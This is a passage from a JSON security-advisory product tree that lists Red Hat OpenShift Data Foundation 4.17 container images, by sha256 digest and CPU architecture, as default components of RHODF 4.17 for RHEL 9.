"product_reference": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le"
},
